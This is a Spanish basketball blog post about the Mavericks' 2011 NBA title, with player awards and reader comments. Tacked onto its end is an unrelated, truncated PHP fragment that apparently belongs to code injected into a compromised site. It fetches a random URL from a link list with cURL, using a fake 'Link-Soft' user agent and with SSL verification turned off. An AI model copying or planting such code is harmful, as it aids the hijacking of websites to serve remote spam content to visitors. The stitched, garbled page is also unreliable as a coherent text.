La Crónica (13/07/2011): La noche de Mark

13 de June de 2011 por TheDeerHunter

Mark Cuban exultante con el trofeo“My biggest fear is that I can’t remember every little part of it, every emotion, every feeling that I went through as the clock was winding down. … I was just hoping I could just do an emotional videotape of myself and just keep it. So that’s my biggest hope and fear that I’ll be able to feel this forever.” .- Mark Cuban

Pocos personajes en la NBA son tan polémicos y despiertan tantas animadversiones como Mark Cuban, el célebre propietario de los Mavericks. Con un carácter mitad showman, mitad hooligan pijo trasnochado se le pueden reprochar muchas cosas, pero jamás su entusiasmo y esfuerzo, más allá de los máximos exigibles, de lograr hacer grande a su franquicia y con ella a la competición. Un dato: Antes de que en el año 2000 se hiciera con el equipo, los Mavericks llevaban únicamente 6 apariciones en playoffs en 19 temporadas. Desde entonces raramente fallan en su cita, acumulan 11 apariciones seguidas (sólo por detrás de Spurs) y tras dos finales por fin pueden decir que están en el selecto club de los “Señores del Anillo”.

Tan sólo un loco podía mantener la fe en un proyecto que parecía terminantemente agotado en la primera ronda del año pasado. Ni los más fanáticos podían sentirse esperanzados. A Cuban no le podemos acusar de ello. Su confianza fue tal que convenció a Nowitzki de que se quedara y se la transmitió a sus jugadores hasta el punto que Terry se tatuó el trofeo. Todos locos, pero locos con un anillo en sus manos.

Dos últimos apuntes en favor del “rey loco/bocazas”. 1) El trofeo no lo recogió él, sino el fundador del equipo. 2) Las de anoche fueron susNowitzki levantando el trofeo de Campeones de la NBA primeras declaraciones desde que empezó la postemporada. Conociéndole debe de haber sido un sacrificio duro.

Ciñéndonos a lo deportivo, el MVP fue para Nowitzki. Anoche fue uno de sus peores partidos en su camino al anillo, pero no importa. Se lo deberían haber dado aún perdiendo la final. Lesionado del dedo, con fiebre, sinusitis… ha anotado tanto como Wade y LeBron juntos. No hay que añadir nada más.

El mejor de la fiesta fue Jason Terry. Se encontró a si mismo en la remontada del cuarto partido, tras un comienzo decepcionante. Su papel ha sido decisivo en los dos siguientes y en el resultado de la final. No se le puede pedir más. Terry en forma y con confianza no tiene que envidiar ofensivamente a prácticamente nadie. Mención a parte para el puertorriqueño JJ Barea, todo un acierto de Carlisle. Jugador de corte atípico e importancia inesperada en esta serie. Anoche volvió a liarla, como ha sido habitual desde que cazó la titularidad. Y eso que Stevenson no lo ha hecho mal.

La victoria de Dallas es la victoria del colectivo en un momento en el que la tendencia es apostar por concentrar el talento. No se debe de obviar el inmenso trabajo de Jason Kidd, que representa en si mismo ese enfoque, o de Marion, Chandler, el propio Stevenson, cada uno de ellos defendiendo de forma inmejorable su rol. Hasta Mahinmi tuvo anoche sus momentos de gloria con los problemas de faltas de Chandler. Si acaso debe de chirriar la presencia de Brian Cardinal, que ha acabado jugando más que Stojakovic.

Lebron y Wade tras perder el 6º partido de la FinalPor Miami ya habrá tiempo de analizar más detalladamente la derrota, o el fracaso, como ha dicho LeBron. Y eso que anoche el Big Three no hizo malos números y además contó con la ayuda de Chalmers (que por fin fue titular) y Haslem. Ha fracasado su principal valor, que es la defensa, pero además se colapsaron nuevamente en el tiro en el momento clave del partido. Mención especial a los tiros libres. Desperdiciaron 13 en una derrota por 10 puntos. Sólo les queda lamentarlo.

Es tiempo de revanchas. El año pasado, Lakers y este año, Dallas. Pero también es tiempo de justicia. La NBA les debía un título a los Mavericks y ahora ya lo tienen. También se lo debía a Nowitzki, Kidd, Stojakovic… Se ha cerrado un capítulo de la historia.

PREMIOS

MVP: No hay discusión posible. Dirk Nowitzki se confirma como MVP de estas finales con una ascendencia sobre el juego de su equipo que va más alla de la duda. Va a ser realmente difícil que no suba peldaños en la lista de los mejores 4 de la historia ahora que tiene su ansiado anillo.  No ha quedado lejos de él Jason Terry, pero evidentemente el Jefe es el Jefe.

Sorpresa: Jose Juan Barea ha sido la sorpresa indiscutible de estas Finales. Salvo algún partido en el principio de la eliminatoria, el portorriqueño ha sido capaz de plantar batalla a los más grandes con una serie de penetraciones suicidas acompañadas de giros inesperados y una capacidad de seleccionar bien el tiro insospechada para muchos. Su caché a subido enteros en las últimas semanas.

Decepción: Creo que va a ser difícil que los aficionados de Miami no se sientan decepcionados. Es evidente que las perspectivas eran buenas, por lo que la caída es más dura aún. Me encantaría meterme en la cabecita de Lebron para poder saber que es lo que está pensando. ¿Se echará la culpa a él mismo? ¿Se la echará a los demás? Quizás la culpa sea del boogie, como cantaban los Jackson.

Esfuerzo en vano: Dwayne Wade ha desaprovechado una espectacular serie en la que ha promediado 26.5 puntos por partido, 7 rebotes  y más de 5 asistencias de media. Tiene que ser duro.

Justicia infinita: Nos permitimos el lujo de cambiar nuestro formato para premiar a uno de los grandes que consigue por fin llevarse el ansiado anillo. Jason Kidd, padre de nuestro logo, consigue así salir del selecto club “y se fueron sin anillo” junto a otros de sus grandes representantes como Nowitzki o Stojakovic. Enhorabuena para todos ellos.

Imágenes | AP Photos / Getty Images

Comenta

20 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Dirk, Kidd, Terry, Marion y Pedja se lomerece. Lebron también se merece la derrota, en esta final no ha esatado a la altura.

    Sigo augurando que los Heat llegarán a 3 anillos con estos equipazos que forman, una final a las primeras de cambio es difícil de ganarla.

      Citar

  2. Viruete dice:
    #2

    Estoy contentísimo por Dirk, Kidd y compañía. Grandísimo partido, un colofón estupendo a una de las temporadas más entretenidas de los últimos años. Y grandísima vuestra labor. Como seguidor en la sombra, quiero agradeceros que sigáis con este blog tan cojonudo con el cual se disfruta aún más la competición.

    Ah, una cosita: ¿quién fue el que se vino abajo en el vestuario? ¿Bosh o Wade? ¿Otro truquito para la cámara “ay, que ya no puedo más de mi lesión en la cadera”?

      Citar

  3. GreenPride dice:
    #3

    Y cayó el título para los Mavs. Nunca me ha gustado tanto equivocarme en una predicción como en estas series. Los Heat se ahogaron en la orilla de su particular playa de South Beach aunque si no se vuelven locos con un par de retoques deberían ser los dominadores de los próximos años en la NBA.
    Pero eso en todo caso será en el futuro.
    Ahora lo que se impone es un Equipo que ha ganado el título por encima de un Big Three más acompañantes. Quizás sirva como titular aunque detrás de este título ha habido muchos temas en juego.
    En cuanto a la serie final para mí claramente y sorprendentemente ha habido una final hasta el 4º partido (incluido este en gran parte) y otra en el final del 4º, 5º y 6º. Hasta finales del 4º Miami dominó y controló la final manteniendo bajo cuerda a Terry y creando muchos problemas con su defensa al ataque de los Mavs. Sólo un atasco grave al final del 2º partido salvó la vida a los Mavs. Sin embargo todo cambió a partir del final del 4º partido sobre todo por 2 factores claves a mi parecer. Uno, que Jet Terry encontró su juego y sus posiciones para anotar siendo más agresivo y provocando graves problemas a la defensa de Miami. Otro, la inlcusión como titular y elemento importantísimo del “enano” Barea en las series. Hasta ese momento había estado errático y no había sido factor pero en los últimos encuentros fue un dolor de cabeza constante para los Heat y ayudó a hacer el ataque de los Mavs mucho más fluido, la prueba que los Mavs pasaron de 100 puntos en los 2 últimos partidos cuando en el resto casi ni se acercaron y subieron muchísimo sus porcentajes de acierto.
    Esto se unió a lo que estaba funcionando para los Mavs hasta ese momento, a saber la entrega de Chandler, la enorme serie en defensa y ataque de Marion, el control de Kidd, el buen papel de Stevenson y por supuesto el gran Dirk. Grandísima final quitando la primera mitad de este 6º partido. El gran Robin Hood por fin tiene su título, ya nadie podrá decirle que le falta, que no es un grande porque no pudo llevar a su equipo al título y directamente pasa a formar parte de los elegidos de este deporte. Lo siento por nuestro Pau, pero ahora mismo queda como el mejor europeo de todos los tiempos y enetra directamente a la historia. Felicidades por su lucha y por su forma de perseguir este título. Me alegro sobre todo por él y por Jason Kidd, otro que ha tardado mucho mucho tiempo y al final en quizás su última oportunidad y cuando ya nadie lo esperaba lo ha conseguido.
    Por el lado perdedor, los Heat caen y levantan una gran pregunta. ¿Donde ha estado LeBron en esta final? Tengo que reconocer que yo estaba por darle ya esta temporada como la de su verdadera consagración como jugador legendario debido a los playoffs que estaba haciendo. Sin duda fue el jugador decisivo contra Celtics y Bulls acertando en casi todas las jugadas decisivas y llevando en volandas a su equipo cuando quema el balón. Sin embargo en estas finales ha vuelto a su particular infierno. Incapaz de anotar de fuera cuando más aprieta, en muchos partidos ha estado totalmente fuera de ritmo, incluso perdiendo su agresividad y dejándolo todo en manos de Wade que sí ha cuajado unas finales acordes a su categoría y mucho mejores que las del elegido. Sin duda su bajo rendimiento, superado incluso a veces por Marion ha sido determinante en estas finales y le empieza a crear una fama ya bien merecida de “perdedor” que amenaza su rutilante carrera. Dicho esto hay que valorar que un equipo totalmente nuevo y con lesionados de importancia ha estado a un paso de proclamarse campeón y que si no se vuelven locos en Miami y retocan la plantilla convenientemente están llamados a ser los grandes dominadores de la competición los próximos años. Pero cuidado, si los egos entran en juego y los 3 divos empiezan a tener una convivencia difícil, podemos asistir a un desastre de proyecto de proporciones del Titanic. Será interesantísimo poder ver cómo se mueven en el mercado y cómo se desenvuelven la temporada que viene si el lockout no lo impide.
    Para los Mavs queda disfrutar sabiendo que será complicado poder repetir éxito. Con muchos veteranos y teniendo en cuenta que nadie les daba ni por Finalistas este año (casi ni como finalistas de conferencia tampoco) hay que decir que en principio parece difícil que puedan repetir título, aunque han ganado sin su alero titular y all-star Caron Butler y la plantilla es de lujo como para volver a intentarlo.
    Se cierra la temporada que ha traído sorpresas y un campeón que nadie esperaba. Esto es lo bonito de la NBA y esperemos que dueños y jugadores se entiendan para poder volver a vivirlo a partir de Octubre

      Citar

  4. Blade Petrovic dice:
    #4

    Por fin kidd y nowiktzi con siguen el anillo que les hacía falta para ser GRANDES

      Citar

  5. busky23 dice:
    #5

    La unión,el grupo,es mucho más fuerte que cualquier
    “BigThree”, me alegro mucho por Dallas,por Cuban,que lo ha dado todo hasta conseguir llegar a lo más alto,por Nowitzki,al que el baloncesto le ha devuelto todo lo que él le ha dado a este deporte,pero especialmente me alegro porque una vez más se ha demostrado que el conjunto,el esfuerzo colectivo,las ganas,el trabajo,el creerse que nadie es más importante que nadie…ha vuelto a derrotar al egocentrismo,el talento y la falta d respeto que para mi es lo único que tienen estos Heat.
    Quizás dominen la liga los próximos años,eso está por ver,solo espero que estos Heat,especialmente el autoproclamado rey ,aprenda de esta derrota y se de cuenta d una vez que el camino al anillo es algo más que juntarse con amiguitos muy buenos y hacer cada uno la guerra por su cuenta,lo siento por Wade,el si ha estado a la altura,a Lebron,esta final…le ha venido grande.

    Un gran colofón a unos grandes playoffs,mi agradecimiento a todos y cada uno que hacen posible este blog.
    I LOVE THIS GAME!!

      Citar

  6. Viva_Dirk dice:
    #6

    Me alegro tantísimo por Nowitzki que no puedo decirlo con palabras, una alegría inmensa.

    Y una gran noticia para el baloncesto, un equipo talentoso que no destaca por el físico ni la defensa demostrando que con actitud se pueden suplir dichos defectos, algo que no pasa con el talento.

      Citar

  7. Txusma dice:
    #7

    Saltos he pegado en el coche cuando me he enterado de la victoria de los Mavs. Kidd y Nowitzki no se podían retirar sin un anillo. A lo mejor de aquí a unos años estoy diciendo lo mismo de Lebron… 😀

      Citar

  8. -=TheKing=- dice:
    #8

    Hay una estadistica que en mi opinión lo dice todo: En los 6 partidos, Dallas +36 puntos con Lebron James en cancha. Sin, +22 Miami.

      Citar

  9. HeiNeKeN dice:
    #9

    Me alegro mucho por J-Kidd, a ver si el proximo año le toca a Nash xDD

      Citar

  10. TheDeerHunter dice:
    #10

    Creo que nos olvidamos de un nombre.
    Carlisle se ha llevado un anillo merecido y ahora se nombra entre grandes nombres de entrenadores en cuanto a números e hitos, y eso que había mucha gente que decía de él que era un entrenador de regular season y un loser.

    Lo del término loser cada día tiene más guasa.

      Citar

  11. ralage dice:
    #11

    Contento por los Mavs, fue serie muy igualada donde para mí, la aportación extra de todos los jugadores en estos 2 últimos partidos, fue la clave, y es que piensas Terry, Kidd, Barea aparecerán, pero aquí hasta Cardinal o Mahinmi jugaron de manera acertada.

    Enhorabuena también a TheDeerHunter por clavar el prónostico, cuando la mayoría nos inclinabamos hacia los Heat

      Citar

  12. Denise dice:
    #12

    Yo creo que casi nadie se esperaba a principios de temporada que los Mavs iban a ganar el anillo, y más aún sin su estrella exterior Butler, y un importante jugador de banquillo como Beaubois. Doble mérito ganar así para los Mavs, con bajas importantes.
    El nivel de Nowitzki en estos playoffs no hace falta comentarlo, y las sorpresa positivas, la regularidad de Marion y la irrupción de Barea.
    Por parte de los Heat, tampoco considero que sea un fracaso, en los próximos años, con este gran Big Three más con lo que consigan rodearlo, estoy seguro de que van a jugar bastantes finales de conferencia y de NBA.

    Como bien dicen por ahí, ya solo falta Nash por conseguir el anillo.

      Citar

  13. Scriers dice:
    #13

    Lo que es impresionante es el nivel de acierto de Thedeerhunter en los pronósticos este año. Brutal.

      Citar

  14. Denise dice:
    #14

    Y por cierto, si hay ahora mismo un hombre más feliz que Nowitzki, o Mark Cuban, ese es el propietario de los Cavaliers. Vaya fiestorro se montaría ayer a costa de ver el cabizbajo careto de Lebron y los palos que se está llevando.

      Citar

  15. oasis dice:
    #15

    Podría dar la enhorabuena a Dirk, a Terry o a Cuban… pero os la doy a los que hacéis posible a diario este magnífico blog. De un fiel seguidor vuestro en la ‘sombra’. Gracias!

      Citar

  16. Rompe dice:
    #16

    Me uno al sentir general. Enhorabuena a Dallas y, sobre todo, a todo el equipo y sospechosos habituales de este blog jeje. Y también a GreenPride, que todos los días nos hace su personal resumen de los hechos.
    Muchas gracias a todos, un placer leeros!

      Citar

  17. HisRoyalAirness dice:
    #17

    Qué grande Dallas y que grande Dirk (ayer me la jugué quedándome a verlo que hoy tuve examen pero mereció la pena).
    Yo fui un o de los que rajaron de Carlisle y me he comido mis palabras, aunque bien a gusto.
    Increíble lo enchufados que salieron JJ y Terry, espectacular, pocas veces he visto semejante confianza y efectividad juntas.
    Me da pena por Wade, por el pedazo de jugador que es y por las finales que ha hecho pero no dejo de pensar que si en vez de Lebron hubiesen pescado a Howard ahora mismo tendría otro anillo. Se pisan el liderazgo escandalosamente.

    Y por cierto, los grandes aparecen en los grandes momentos, y el momento más grande son las finales. Lebron tiene muchos años por delante pero tiene que dejarse de tanta parafernalia porque lo único que hace es meterle más presión

      Citar

  18. Blade Petrovic dice:
    #18

    Por fin la suerte sonríe a Kidd y Nowiktzi consiguen el anillo que les faltaba.
    Además los mavs con numerosas bajas como Butler.
    Como dicen anillo 2012 para Nash.
    El tiepo le ha devuelto a los mavs lo que les quitó en 2006

      Citar

  19. Javijaen dice:
    #19

    Mi opinión antes de leer la de los demás:
    Merecida victoria final de Mavs, sobre todo con los grandes finales de Nowitzki, Terry y Barea, pero sin olvidar de las grandes actuaciones de Kidd, Marion (de más a menos) o Chandler. Estos seis jugadores principalmente son los que han llevado al anillo a Mavs, ya que Stevenson, Cardinal, Stojakovic… fueron meras piezas para completar.
    Mi reconocimiento a Carlisle, del que todos decían (decíamos) que era entrenador de fase regular. Realmente ha sido capaz de darle la vuelta al viento que soplaba para Miami en los tres primeros partidos.
    Por parte de dar palos: el primero de todos a Lebron, demasiado cortocircuitado, demasiadas pérdidas, este sexto partido (excepto los cuatro primeros tiros, unos cuatro minutos) hasta Ritley con muletas lo hubiera hecho mejor. Segundo a Spoelstra, que aunque no podemos señalar como gran culpable, sí que se ha visto sobrepasado por Carlisle. Espero que tenga una segunda oportunidad. Por último, a Ritley, por tener algunos jugadores excesivamente rellenistas: véase Howard-Bibby-House-Anthony-Miller… aunque algunos partidos hayan podido destacar, en general han estado muy mal. Sólo salvo a Bosh (que debe apretar, no le llamen “blando”), Wade, Chalmers y Haslem.
    Enhorabuena a los merecidos (y deseados por lo visto) campeones, y a Miami le toca espabilar, especialmente a James…

      Citar

  20. tobal dice:
    #20

    Qué alegria ver por fin,a los Dallas Mavericks con el anillo de campeones de la NBA,ha sido el triunfo del juego en equipo y de la costancia,es el premio a una franquicia que lleva 11 temporadas seguidas alcanzando los playoffs,que es algo que tiene mucho mérito.Y qué decir de Nowitzki,por fin tiene el ansiado título de campeón de la NBA,además de ser el MVP de las finales,ya era hora que el alemán consiguiera esto,ahora con este premio pasa a ser uno de los mejores jugadores de la historia de la competición y ser el mejor jugador europeo de la historia,pero no me quiero olvidar del principal escudero de Dallas como es Jason Terry,que se ha marcado una gran final,anotando en momentos cruciales,además saliendo desde el banquillo,desde este blog quiero mandar un saludo a todos los fans de Dallas como yo,deseando que hayan disfrutado de este éxito de la franquicia texana ! Felicidades Mavericks !

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>